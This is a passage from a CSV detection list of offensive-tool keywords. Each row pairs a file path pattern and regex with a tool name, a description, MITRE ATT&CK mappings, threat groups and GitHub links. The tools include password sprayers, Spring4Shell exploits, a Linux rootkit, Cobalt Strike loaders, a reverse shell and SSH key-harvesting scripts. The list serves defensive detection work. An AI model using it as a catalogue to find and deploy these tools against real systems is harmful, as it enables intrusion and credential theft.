Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*/SprayAD.exe*",".{0,1000}\/SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*/Spray-AD/*",".{0,1000}\/Spray\-AD\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*/sprayers/owa.py*",".{0,1000}\/sprayers\/owa\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/sprayhound.git*",".{0,1000}\/sprayhound\.git.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*/sprayhound/*.py*",".{0,1000}\/sprayhound\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*/spraying.py*",".{0,1000}\/spraying\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","352","59","2024-03-21T06:25:58Z","2022-03-01T14:31:27Z" "*/SprayingToolkit*",".{0,1000}\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/SprayingToolkit.git*",".{0,1000}\/SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/spray-results.txt*",".{0,1000}\/spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","4","347","105","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*/SpringCore0day*",".{0,1000}\/SpringCore0day.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*/spring-core-rce*",".{0,1000}\/spring\-core\-rce.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*/Spring-CVE/*",".{0,1000}\/Spring\-CVE\/.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*/SpringFramework_CVE-2022-22965_RCE*",".{0,1000}\/SpringFramework_CVE\-2022\-22965_RCE.{0,1000}","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*/springshell-rce-poc*",".{0,1000}\/springshell\-rce\-poc.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","20","11","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" "*/sql_inj.txt*",".{0,1000}\/sql_inj\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/sqli.txt*",".{0,1000}\/sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sqli/mssqli*",".{0,1000}\/sqli\/mssqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/mysqli*",".{0,1000}\/sqli\/mysqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/postgresqli*",".{0,1000}\/sqli\/postgresqli.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/sqlitei*",".{0,1000}\/sqli\/sqlitei.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli/utils*",".{0,1000}\/sqli\/utils.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/sqli_test.rb*",".{0,1000}\/sqli_test\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Sqlmap*",".{0,1000}\/Sqlmap.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*/sqlmap.zip*",".{0,1000}\/sqlmap\.zip.{0,1000}","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","250","95","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*/SQLRecon*",".{0,1000}\/SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "*/sqrtZeroKnowledge/CVE-*",".{0,1000}\/sqrtZeroKnowledge\/CVE\-.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/src/common/c&c.h*",".{0,1000}\/src\/common\/c\&c\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/src/exploit.html.tpl*",".{0,1000}\/src\/exploit\.html\.tpl.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/src/john.com*",".{0,1000}\/src\/john\.com.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/jumbo.c*",".{0,1000}\/src\/jumbo\.c.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/jumbo.h*",".{0,1000}\/src\/jumbo\.h.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/src/KaynStrike.c*",".{0,1000}\/src\/KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/src/nysm.c*",".{0,1000}\/src\/nysm\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/src/pendulum.c*",".{0,1000}\/src\/pendulum\.c.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/src/pendulum.h*",".{0,1000}\/src\/pendulum\.h.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/src/RecycledGate.h*",".{0,1000}\/src\/RecycledGate\.h.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/src/Sleeper.cpp*",".{0,1000}\/src\/Sleeper\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/src/unixshell.rs*",".{0,1000}\/src\/unixshell\.rs.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/src/winsos.cpp*",".{0,1000}\/src\/winsos\.cpp.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*/srdi-shellcode.go*",".{0,1000}\/srdi\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/srv/kidlogger*",".{0,1000}\/srv\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/ssh2-enum-algos.nse*",".{0,1000}\/ssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sshame*",".{0,1000}\/sshame.{0,1000}","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","72","14","2024-03-24T11:07:35Z","2019-08-25T16:50:56Z" "*/ssh-auth-methods.nse*",".{0,1000}\/ssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-brute.nse*",".{0,1000}\/ssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-hostkey.nse*",".{0,1000}\/ssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sshimpanzee.git*",".{0,1000}\/sshimpanzee\.git.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*/ssh-publickey-acceptance.nse*",".{0,1000}\/ssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssh-run.nse*",".{0,1000}\/ssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SSH-Snake.git*",".{0,1000}\/SSH\-Snake\.git.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/SSH-Snake/*",".{0,1000}\/SSH\-Snake\/.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/sshv1.nse*",".{0,1000}\/sshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-ccs-injection.nse*",".{0,1000}\/ssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-cert.nse*",".{0,1000}\/ssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-cert-intaddr.nse*",".{0,1000}\/ssl\-cert\-intaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ssl-date.nse*",".{0,1000}\/ssl\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 